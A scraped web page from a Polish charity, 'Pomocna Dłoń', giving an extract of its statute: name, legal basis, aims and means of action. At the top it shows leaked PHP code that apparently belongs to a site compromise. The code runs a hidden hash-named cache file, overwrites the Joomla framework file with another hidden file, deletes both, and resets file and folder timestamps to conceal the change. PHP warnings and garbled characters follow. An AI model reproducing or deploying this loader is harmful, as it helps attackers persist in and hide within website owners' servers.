$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 426
Wyciąg ze Statutu Stowarzyszenia
 
Wyciąg ze Statutu Stowarzyszenia

 Rozdział I

Postanowienia ogólne

§1

Stowarzyszenie nosi nazwę:
Stowarzyszenie na Rzecz Pomocy Potrzebującym i Zapobiegania Patologiom Społecznym "POMOCNA DŁOŃ".

§2

Stowarzyszenie Działa na podstawie ustawy z dnia 7 kwietnia 1989 roku - Prawo o stowarzyszeniach (Dz. U. Nr 20 poz. 104) i posiada osobowość prawną.
Stowarzyszenie powołuje się na czas nieokreślony.

§3

Terenem działania jest obszar Rzeczypospolitej Polskiej, zaś siedziba mieści się w miejscowości Gnojnik.

§4

Stowarzyszenie może używać pieczęci i oznak zgodnie z obowiązującymi w tym zakresie przepisami.

§5

Stowarzyszenie współpracuje z Organami Państwowymi, Samorządowymi, kościołami, oraz polskimi i zagranicznymi organizacjami społecznymi, w realizacji zadań zbieżnych z celami Stowarzyszenia.

§6

Działalność Stowarzyszenia opiera się na pracy społecznej ogółu członków. Do prowadzenia swych spraw może zatrudnić pracowników.

§7

Stowarzyszenie może tworzyć terenowe jednostki organizacyjne.

  

Rozdział II

Cele i środki działania

  §8

Celem Stowarzyszenia jest m.in.:

Wspieranie szeroko pojętej pomocy innym.
Działanie na rzecz służby zdrowia i poprawy dostępności do usług medycznych, zwłaszcza mieszkańcom małych miejscowości
Promowanie idei integracji ludzi zdrowych i niezdolnych do samodzielnego funkcjonowania - w tym upośledzonych umysłowo.
Aktywne przeciwdziałanie wszelkiego rodzaju formom uzależnień, w szczególności alkoholizmowi, narkomani i nikotynizmowi.
Zapobieganie agresji oraz przemocy fizycznej i psychicznej wśród młodzieży oraz wszelkich form przemocy w rodzinie.
Niesienie pomocy ludziom bezdomnym, ubogim i niepełnosprawnym.
Prowadzenie działalności oświatowej i wychowawczej.
Pomoc ofiarom wypadków komunikacyjnych
Organizowanie letniego i zimowego wypoczynku dla dzieci

§9

Stowarzyszenie będzie realizować swoje cele poprzez:

Poprawę warunków środowiskowych - w tym materialnych - sprzyjających pełnemu fizycznemu i osobowemu rozwojowi ludzi objętych opieką poprzez tworzenie i powadzenie: Warsztatów Terapii Zajęciowej, DPS – w tym placówek pobytu dziennego, Domów Dziecka, świetlic integracyjnych
Wydawanie, w miarę potrzeby, własnych czasopism, biuletynów, broszur, ulotek, opracowań książkowych, nagrań audio, wideo, oraz materiałów na nośnikach elektronicznych.
Doradztwo i opiekę prawną - pomoc w zakresie umożliwienia pełnego korzystania z ochrony prawnej dla ofiar przestępstw, w tym przede wszystkim wypadków drogowych.
Doradztwo i pomoc prawną dla rodzin zastępczych i adopcyjnych, oraz kandydatów na rodziny zastępcze i adopcyjne.

 
Pomagaj razem z nami, moesz przekaza� swoj darowizne za po�rednictwem internetu
Pomoc ofiarom wypadkw komunikacyjnych
Projekty Aktywizujce
Zielone Ochronki
Spartakiady
Warsztaty Terapi Zajciowej w Zawadzie Uszewskiej
 

Copyright © Stowarzyszenie "Pomocna Do"